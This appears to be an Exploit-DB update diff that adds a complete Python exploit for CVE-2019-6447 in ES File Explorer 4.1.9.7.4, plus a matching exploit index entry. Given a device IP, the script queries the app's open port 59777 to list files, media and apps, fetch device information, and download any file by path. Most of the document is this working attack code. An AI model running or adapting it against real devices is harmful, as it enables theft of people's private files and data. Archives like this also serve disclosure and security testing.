DB: 2021-06-30

1 changes to exploits/shellcodes

ES File Explorer 4.1.9.7.4 - Arbitrary File Read

exploits/android/remote/50070.py

@@ -0,0 +1,86 @@
+# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
+# Date: 29/06/2021
+# Exploit Author: Nehal Zaman
+# Version: ES File Explorer v4.1.9.7.4
+# Tested on: Android
+# CVE : CVE-2019-6447
+
+import requests
+import json
+import ast
+import sys
+
+if len(sys.argv) < 3:
+    print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
+    sys.exit(1)
+
+url = 'http://' + sys.argv[2] + ':59777'
+cmd = sys.argv[1]
+cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
+listCmds = cmds[:9]
+if cmd not in cmds:
+    print("[-] WRONG COMMAND!")
+    print("Available commands : ")
+    print("  listFiles         : List all Files.")
+    print("  listPics          : List all Pictures.")
+    print("  listVideos        : List all videos.")
+    print("  listAudios        : List all audios.")
+    print("  listApps          : List Applications installed.")
+    print("  listAppsSystem    : List System apps.")
+    print("  listAppsPhone     : List Communication related apps.")
+    print("  listAppsSdcard    : List apps on the SDCard.")
+    print("  listAppsAll       : List all Application.")
+    print("  getFile           : Download a file.")
+    print("  getDeviceInfo     : Get device info.")
+    sys.exit(1)
+
+print("\n==================================================================")
+print("|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |")
+print("|                Coded By : Nehal a.k.a PwnerSec                 |")
+print("==================================================================\n")
+
+header = {"Content-Type" : "application/json"}
+proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}
+
+def httpPost(cmd):
+    data = json.dumps({"command":cmd})
+    response = requests.post(url, headers=header, data=data)
+    return ast.literal_eval(response.text)
+
+def parse(text, keys):
+    for dic in text:
+        for key in keys:
+            print(f"{key} : {dic[key]}")
+        print('')
+
+def do_listing(cmd):
+    response = httpPost(cmd)
+    if len(response) == 0:
+        keys = []
+    else:
+        keys = list(response[0].keys())
+    parse(response, keys)
+
+if cmd in listCmds:
+    do_listing(cmd)
+
+elif cmd == cmds[9]:
+    if len(sys.argv) != 4:
+        print("[+] Include file name to download.")
+        sys.exit(1)
+    elif sys.argv[3][0] != '/':
+        print("[-] You need to provide full path of the file.")
+        sys.exit(1)
+    else:
+        path = sys.argv[3]
+        print("[+] Downloading file...")
+        response = requests.get(url + path)
+        with open('out.dat','wb') as wf:
+            wf.write(response.content)
+        print("[+] Done. Saved as `out.dat`.")
+
+elif cmd == cmds[10]:
+    response = httpPost(cmd)
+    keys = list(response.keys())
+    for key in keys:
+        print(f"{key} : {response[key]}")

files_exploits.csv

@@ -18511,6 +18511,7 @@ id,file,description,date,author,type,platform,port
 49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",2021-06-03,sirpedrotavares,remote,hardware,
 50034,exploits/hardware/remote/50034.txt,"Dlink DSL2750U - 'Reboot' Command Injection",2021-06-18,"Mohammed Hadi",remote,hardware,
 50039,exploits/solaris/remote/50039.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (3)",2021-06-21,"Nathaniel Singer",remote,solaris,
+50070,exploits/android/remote/50070.py,"ES File Explorer 4.1.9.7.4 - Arbitrary File Read",2021-06-29,"Nehal Zaman",remote,android,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,